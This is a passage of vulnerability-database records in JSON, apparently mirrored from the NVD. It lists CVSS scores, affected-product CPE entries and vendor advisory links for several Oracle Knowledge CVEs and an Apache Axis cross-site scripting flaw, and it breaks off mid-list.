"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 1.4,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2016-07-21T10:12:28.397",
"references": [
{
"source": "secalert_us@oracle.com",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html"
},
{
"source": "secalert_us@oracle.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/91787"
},
{
"source": "secalert_us@oracle.com",
"url": "http://www.securityfocus.com/bid/91944"
},
{
"source": "secalert_us@oracle.com",
"url": "http://www.securitytracker.com/id/1036400"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/91787"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/bid/91944"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securitytracker.com/id/1036400"
}
],
"sourceIdentifier": "secalert_us@oracle.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-04-15 14:15
Modified
2024-11-21 05:26
Severity ?
Summary
Vulnerability in the Oracle Knowledge product of Oracle Knowledge (component: Information Manager Console). Supported versions that are affected are 8.6.0-8.6.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Knowledge. Successful attacks of this vulnerability can result in takeover of Oracle Knowledge. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:oracle:knowledge:*:*:*:*:*:*:*:*",
"matchCriteriaId": "774429F8-BEB6-4942-86C4-51129C11E655",
"versionEndIncluding": "8.6.2",
"versionStartIncluding": "8.6.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Vulnerability in the Oracle Knowledge product of Oracle Knowledge (component: Information Manager Console). Supported versions that are affected are 8.6.0-8.6.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Knowledge. Successful attacks of this vulnerability can result in takeover of Oracle Knowledge. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)."
},
{
"lang": "es",
"value": "Vulnerabilidad en el producto Oracle Knowledge de Oracle Knowledge (componente: Information Manager Console). Las versiones compatibles que est\u00e1n afectadas son 8.6.0-8.6.2. Una vulnerabilidad explotable f\u00e1cilmente permite a un atacante no autenticado con acceso a la red por medio de HTTP comprometer a Oracle Knowledge. Los ataques con \u00e9xito de esta vulnerabilidad pueden resultar en la toma de control de Oracle Knowledge. CVSS 3.0 Puntuaci\u00f3n Base 9.8 (Impactos de la confidencialidad, la integridad y la disponibilidad). Vector CVSS: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)."
}
],
"id": "CVE-2020-2791",
"lastModified": "2024-11-21T05:26:16.877",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "secalert_us@oracle.com",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-04-15T14:15:27.560",
"references": [
{
"source": "secalert_us@oracle.com",
"tags": [
"Vendor Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
}
],
"sourceIdentifier": "secalert_us@oracle.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-04-15 14:15
Modified
2024-11-21 05:25
Severity ?
Summary
Vulnerability in the Oracle Knowledge product of Oracle Knowledge (component: Information Manager Console). Supported versions that are affected are 8.6.0-8.6.1. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Knowledge. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Knowledge accessible data. CVSS 3.0 Base Score 4.3 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N).
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:oracle:knowledge:8.6.0:*:*:*:*:*:*:*",
"matchCriteriaId": "0861D587-F6C2-4C4D-981D-237B953E642C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:knowledge:8.6.1:*:*:*:*:*:*:*",
"matchCriteriaId": "24F6EEE7-F1FA-4F04-B053-E07298E16506",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Vulnerability in the Oracle Knowledge product of Oracle Knowledge (component: Information Manager Console). Supported versions that are affected are 8.6.0-8.6.1. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Knowledge. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Knowledge accessible data. CVSS 3.0 Base Score 4.3 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N)."
},
{
"lang": "es",
"value": "Vulnerabilidad en el producto Oracle Knowledge de Oracle Knowledge (componente: Information Manager Console). Las versiones compatibles que est\u00e1n afectadas son 8.6.0-8.6.1. Una vulnerabilidad explotable f\u00e1cilmente permite a un atacante no autenticado con acceso a la red por medio de HTTP comprometer a Oracle Knowledge. Los ataques con \u00e9xito requieren una interacci\u00f3n humana de una persona diferente del atacante. Los ataques con \u00e9xito de esta vulnerabilidad pueden resultar en una actualizaci\u00f3n no autorizada, insertar o eliminar el acceso a algunos de los datos accesibles de Oracle Knowledge. CVSS 3.0 Puntuaci\u00f3n Base 4.3 (Impactos de la integridad). Vector CVSS: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N)."
}
],
"id": "CVE-2020-2522",
"lastModified": "2024-11-21T05:25:26.403",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 1.4,
"source": "secalert_us@oracle.com",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 1.4,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-04-15T14:15:21.937",
"references": [
{
"source": "secalert_us@oracle.com",
"tags": [
"Vendor Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
}
],
"sourceIdentifier": "secalert_us@oracle.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-04-15 14:15
Modified
2024-11-21 05:25
Severity ?
Summary
Vulnerability in the Oracle Knowledge product of Oracle Knowledge (component: InQuira Search). Supported versions that are affected are 8.6.0-8.6.3. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Knowledge. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Knowledge. CVSS 3.0 Base Score 5.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H).
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:oracle:knowledge:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9E587602-BA7D-4087-BE29-ACE0B01BD590",
"versionEndIncluding": "8.6.3",
"versionStartIncluding": "8.6.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Vulnerability in the Oracle Knowledge product of Oracle Knowledge (component: InQuira Search). Supported versions that are affected are 8.6.0-8.6.3. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Knowledge. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Knowledge. CVSS 3.0 Base Score 5.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)."
},
{
"lang": "es",
"value": "Vulnerabilidad en el producto Oracle Knowledge de Oracle Knowledge (componente: InQuira Search). Las versiones compatibles que est\u00e1n afectadas son 8.6.0-8.6.3. Una vulnerabilidad dif\u00edcil de explotar permite a un atacante no autenticado con acceso a la red por medio de HTTP comprometer a Oracle Knowledge. Los ataques con \u00e9xito de esta vulnerabilidad pueden resultar en una capacidad no autorizada para causar una suspensi\u00f3n o bloqueo repetible frecuentemente (DOS completa) de Oracle Knowledge. CVSS 3.0 Puntuaci\u00f3n Base 5.9 (Impactos de la disponibilidad). Vector CVSS:(CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)."
}
],
"id": "CVE-2020-2524",
"lastModified": "2024-11-21T05:25:26.590",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
},
"exploitabilityScore": 2.2,
"impactScore": 3.6,
"source": "secalert_us@oracle.com",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.2,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-04-15T14:15:22.217",
"references": [
{
"source": "secalert_us@oracle.com",
"tags": [
"Vendor Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
}
],
"sourceIdentifier": "secalert_us@oracle.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2018-08-02 13:29
Modified
2024-11-21 04:13
Severity ?
Summary
Apache Axis 1.x up to and including 1.4 is vulnerable to a cross-site scripting (XSS) attack in the default servlet/services.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:apache:axis:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5114D26C-501B-4F51-B12C-D8A4537BEC80",
"versionEndIncluding": "1.4",
"versionStartIncluding": "1.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:oracle:agile_engineering_data_management:6.2.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "80C9DBB8-3D50-4D5D-859A-B022EB7C2E64",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:agile_product_lifecycle_management_framework:9.3.3:*:*:*:*:*:*:*",
"matchCriteriaId": "8454A130-2E9B-4528-A24D-1B3D0FFCC860",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:application_testing_suite:13.2.0.1:*:*:*:*:*:*:*",
"matchCriteriaId": "10F17843-32EA-4C31-B65C-F424447BEF7B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:application_testing_suite:13.3.0.1:*:*:*:*:*:*:*",
"matchCriteriaId": "A125E817-F974-4509-872C-B71933F42AD1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:big_data_discovery:1.6:*:*:*:*:*:*:*",
"matchCriteriaId": "8C4C38FF-B75B-4DF1-BFB3-C91BDD10D90E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_asap_cartridges:7.2:*:*:*:*:*:*:*",
"matchCriteriaId": "D4CE3535-FC9D-4FB2-8739-19E7477B07FF",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_asap_cartridges:7.3:*:*:*:*:*:*:*",
"matchCriteriaId": "58A06A98-0374-4B56-9045-D939F30BF479",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_design_studio:7.3.4.3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "313F42E5-1BBB-4773-A153-B114C3FDF701",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_design_studio:7.3.5.5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "AC75FE72-6C3F-428E-9C9A-60982455238B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_design_studio:7.4.0.4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B370B017-2E3B-438B-86B9-EEF70E3A5D3A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_design_studio:7.4.1.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "63C81E5E-3C53-4731-96C3-0F5767874B11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_element_manager:8.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "ED5503EC-63B6-47EB-AE37-14DD317DDDD8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_element_manager:8.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "A99F85F8-F374-48B0-9534-BB9C07AFE76E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_element_manager:8.1.1:*:*:*:*:*:*:*",
"matchCriteriaId": "0C57FD3A-0CC1-4BA9-879A-8C4A40234162",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_element_manager:8.2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "698FB6D0-B26F-4760-9B9B-1C65FBFF2126",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_network_integrity:7.3.5:*:*:*:*:*:*:*",
"matchCriteriaId": "FB92D8A7-2ABD-4B70-A32C-4B6B866C5B8B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_network_integrity:7.3.6:*:*:*:*:*:*:*",
"matchCriteriaId": "B21E6EEF-2AB7-4E96-B092-1F49D11B4175",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_order_and_service_management:7.3.0.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "DB472856-38AB-4062-B752-E204B177DE72",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_order_and_service_management:7.4:*:*:*:*:*:*:*",
"matchCriteriaId": "1F015E20-7886-4713-B4EC-FE7894066D09",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_session_report_manager:8.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "7DDF6809-53A7-4F7D-9FA8-B522BE8F7A21",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_session_report_manager:8.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "AA86A15F-FAB8-4DF5-95AC-DA3D1CF7A720",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_session_report_manager:8.1.1:*:*:*:*:*:*:*",
"matchCriteriaId": "DB43DFD4-D058-4001-BD19-488E059F4532",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_session_report_manager:8.2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "086E2E5C-44EB-4C07-B298-C04189533996",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_session_route_manager:8.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "4B042935-BC42-4CA8-9379-7F0F894F9653",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_session_route_manager:8.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "3B374F86-4EC8-4797-A8C3-5C1FF1DFC9F8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_session_route_manager:8.1.1:*:*:*:*:*:*:*",
"matchCriteriaId": "5682DAEB-3810-4541-833A-568C868BCE0B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_session_route_manager:8.2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "01BC9AED-F81D-4344-AD97-EEF19B6EA8C7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:endeca_information_discovery_studio:3.2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "9D03A8C9-35A5-4B75-9711-7A4A60457307",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:enterprise_manager_base_platform:12.1.0.5:*:*:*:*:*:*:*",
"matchCriteriaId": "36E39918-B2D6-43F0-A607-8FD8BFF6F340",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.3.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "7582B307-3899-4BBB-B868-BC912A4D0109",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:enterprise_manager_for_fusion_middleware:12.1.0.5:*:*:*:*:*:*:*",
"matchCriteriaId": "14480702-4398-4C28-82A6-E7329FB3B650",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B5BC32AA-78BE-468B-B92A-5A0FFFA970FA",
"versionEndIncluding": "7.3.5",
"versionStartIncluding": "7.3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F6E8C634-FC3E-418F-8D7D-B71E1A3E2DBE",
"versionEndIncluding": "8.0.8",
"versionStartIncluding": "8.0.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_compliance_regulatory_reporting:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1DDD1A52-5794-4837-847C-E5F073330774",
"versionEndIncluding": "8.0.8",
"versionStartIncluding": "8.0.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:*:*:*:*:*:*:*:*",
"matchCriteriaId": "547D042E-51DE-430D-B4BA-F0698646BC80",
"versionEndIncluding": "8.0.7",
"versionStartIncluding": "8.0.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:flexcube_core_banking:11.7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "87416B3B-3B2B-486B-B931-19199EF07000",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:flexcube_core_banking:11.8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "1102B6BC-D99E-4AC0-9375-FB8517A4A71F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:flexcube_core_banking:11.9.0:*:*:*:*:*:*:*",
"matchCriteriaId": "4D22386C-FEC4-4984-8E2A-8FE4796BEFBE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:flexcube_core_banking:11.10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B283B614-9E31-4148-8688-B0672B3A77B3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:flexcube_private_banking:12.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "6762F207-93C7-4363-B2F9-7A7C6F8AF993",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:flexcube_private_banking:12.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "1B74B912-152D-4F38-9FC1-741D6D0B27FC",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:hospitality_guest_access:4.2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "1A3DC116-2844-47A1-BEC2-D0675DD97148",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:hospitality_guest_access:4.2.1:*:*:*:*:*:*:*",
"matchCriteriaId": "E0F1DF3E-0F2D-4EFC-9A3E-F72149C8AE94",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:instantis_enterprisetrack:17.1:*:*:*:*:*:*:*",
"matchCriteriaId": "82EA4BA7-C38B-4AF3-8914-9E3D089EBDD4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:instantis_enterprisetrack:17.2:*:*:*:*:*:*:*",
"matchCriteriaId": "B9C9BC66-FA5F-4774-9BDA-7AB88E2839C4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:instantis_enterprisetrack:17.3:*:*:*:*:*:*:*",
"matchCriteriaId": "7F69B9A5-F21B-4904-9F27-95C0F7A628E3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:internet_directory:12.2.1.3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "68F2A706-3250-4026-9498-CB4B38B23CEC",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:internet_directory:12.2.1.4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "7360EC9B-814F-4FF5-AA9D-9E55A380B2C5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:knowledge:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9E587602-BA7D-4087-BE29-ACE0B01BD590",
"versionEndIncluding": "8.6.3",
"versionStartIncluding": "8.6.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:peoplesoft_enterprise_human_capital_management_human_resources:9.2:*:*:*:*:*:*:*",
"matchCriteriaId": "344A3A9E-3113-4096-B9F8-CA0AD705242B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.56:*:*:*:*:*:*:*",
"matchCriteriaId": "D0A735B4-4F3C-416B-8C08-9CB21BAD2889",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.57:*:*:*:*:*:*:*",
"matchCriteriaId": "7E1E416B-920B-49A0-9523-382898C2979D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.58:*:*:*:*:*:*:*",
"matchCriteriaId": "D9DB4A14-2EF5-4B54-95D2-75E6CF9AA0A9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:policy_automation_connector_for_siebel:10.4.6:*:*:*:*:*:*:*",
"matchCriteriaId": "0DB5E2C7-9C68-4D3B-95AD-9CBF65DE1E94",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:primavera_gateway:16.2.11:*:*:*:*:*:*:*",
"matchCriteriaId": "1DFB9704-6B99-4113-8537-E4AE0F791B86",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:primavera_gateway:17.12.6:*:*:*:*:*:*:*",
"matchCriteriaId": "2F5647E5-B051-41A6-B186-3584C725908B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:primavera_unifier:*:*:*:*:*:*:*:*",
"matchCriteriaId": "08FA59A8-6A62-4B33-8952-D6E658F8DAC9",
"versionEndIncluding": "17.12",
"versionStartIncluding": "17.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:primavera_unifier:16.1:*:*:*:*:*:*:*",
"matchCriteriaId": "D55A54FD-7DD1-49CD-BE81-0BE73990943C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:primavera_unifier:16.2:*:*:*:*:*:*:*",
"matchCriteriaId": "82EB08C0-2D46-4635-88DF-E54F6452D3A3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:primavera_unifier:18.8:*:*:*:*:*:*:*",
"matchCriteriaId": "202AD518-2E9B-4062-B063-9858AE1F9CE2",
"vulnerable": true
},
{
